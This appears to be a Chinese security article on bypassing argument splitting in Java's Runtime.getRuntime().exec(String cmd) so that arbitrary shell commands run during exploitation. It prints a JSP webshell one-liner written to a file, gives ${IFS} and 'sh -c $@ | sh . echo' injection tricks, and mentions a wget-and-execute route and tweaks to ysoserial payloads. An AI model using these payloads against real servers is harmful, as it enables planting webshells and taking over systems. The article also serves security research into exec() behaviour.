在 Runtime.getRuntime().exec(String cmd) 中执行任意shell命令的几种方法

零、背景

=======

在 linux 下，Runtime.getRuntime().exec(String cmd) 通常只能执行简单的shell命令，如 touch /tmp/123.txt 之类的。如果要执行复杂的 shell 命令，例如包含>、$ 等 shell 特殊字符的命令就无法执行，导致无法直接写 webshell 。其原因是， Runtime.getRuntime().exec(String cmd) 是直接拉起被执行的进程，并没有 shell 解析的步骤，和我们通常在shell中执行命令的环境并不一致，因此也无法解析 shell 命令中的特殊字符。

比如我们最常用的，写jsp一句话木马的命令：

如果把这一句作为参数，直接传递给 Runtime.getRuntime().exec(String cmd)，就不能成功执行。

linux下有两种方法，在 Runtime.getRuntime().exec() 中执行任意 shell 命令，分别是：

使用数组参数的 exec(String[] cmds) 接口，代替字符串参数的 exec(String cmd) 接口。
通过其他方法迂回实现，比如先执行 wget 命令下载文件，再执行 chmod 设置文件权限，最后直接调用执行下载的文件或程序。

不过这两种方式并不完善。第一种方式，在exploit的时候，exec() 的调用是由被攻击系统决定的，这部分通常不能由攻击者控制；第二种方式，需要保证被攻击环境到攻击者可控服务器之间的网络可达，而网络情况并不能由攻击者控制。

有没有办法在 linux 下，Runtime.getRuntime().exec(String cmd) 的环境中，不需要特殊的外界网络交互，就能执行任意shell命令呢？

一、分析

回到刚才说的第一种方式，字符串参数的 exec(String cmd) 和数组参数的 exec(String[] cmds)，为什么表现不一样？我们看下代码就会发现，前者明明就是调用了后者。

区别在于，字符串参数的 exec(String cmd) 会使用分隔符将这个字符串参数split成字符串数组，再将其作为数组参数调用数组参数的 exec(String[] cmds)。这里分隔符的定义就在 StringTokenizer 中，包括空格、\t、\n、\r和\f。

如果我们用前述的写一句话木马的shell命令作为参数来调用字符串参数的exec(String cmd)，那么执行到数组参数的 exec(String[] cmds) 的时候，数组中的元素如下：

数组下标

数组元素

-c

echo

"<%if(request.getParameter(\"f\")!=null)(new

java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParamter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>">/tmp/first.jsp

当调用数组版本的 exec(String[] cmds) 时，数组中的元素如下：

数组下标

数组元素

-c

echo "<%if(request.getParameter(\"f\")!=null)(new java.io.FileOutputStream(application.getRealPath(\"/\")+request.getParamter(\"f\"))).write(request.getParameter(\"t\").getBytes());%>">/tmp/first.jsp

也就是说，exec(String cmd) 中通过分隔符的划分，将字符串参数转换成数组参数。这个过程导致了字符串参数被错误的分割，导致shell命令执行失败。

因此，如果需要通过字符串参数的 Runtime.getRuntime().exec(String cmd) 来调用前述的 shell 命令，我们需要找到一个分隔符。这个分隔符不被 java 识别（也就是不属于空格、\t、\n、\r、\f这几种），但又可以被shell环境识别，并利用它来分隔参数。

这个分隔符就是：${IFS}。

二、利用

在 linux 的 shell 中，${IFS} 是一个内置的变量，用于标示命令中参数的分隔符。通常他的取值是空格+TAB+换行（0x20 0x09 0x0a）。

所以，我们将前述的命令修改下，将空格替换为 ${IFS}。

执行下看看：

文件写入成功，命令成功执行。

当然，${IFS} 还有一些限制。因为这个变量的值中含有换行，如果命令解析的时候遇到换行认为命令已经结束就直接执行，可能会丢弃后续的参数而导致一些意想不到的错误。比如，上面的例子中，如果我们在重定向符 > 和文件名之间插入一个**${IFS}，变成“>${IFS}文件名”**的话，文件就无法写入。

三、第二种方式

有没有更好的方法，在**Runtime.getRuntime().exec(String cmd)**中执行shell命令，还不受前述限制呢？

有。就是 sh -c $@ | sh . echo 。只需要将要执行的 shell 命令增加这个前缀，就可以任意执行了。

执行一下看看效果。

文件成功写入，命令执行成功。

四、One More Thing

InfoSec 的研究员 Jackson 提供了一个网页（http://jackson.thuraisamy.me/runtime-exec-payloads.html，点击阅读原文跳转访问），自动将需要执行的shell命令转码成**Runtime.getRuntime().exec(String cmd)** 可以支持的方式。它的原理是将命令 base64 编码，然后解码并执行。转换后的命令中没有空格，是另一种处理的思路。

附记：ysoserial的修改

ysoserial 是生成反序列化攻击 payload 的神器。但是 ysoserial 中很多 payload 都是用字符串参数的Runtime.getRuntime().exec(String cmd) 生成的。如果你觉得不顺手，希望换成数组参数的 Runtime.getRuntime().exec(String[] cmds) ，只需要修改下 Gadgets.java 中 cmd 的拼接语句就好。

当然，你也可以使用本文中提供的技巧，利用字符串参数的 exec(String cmd) 中执行你所希望的 shell 命令。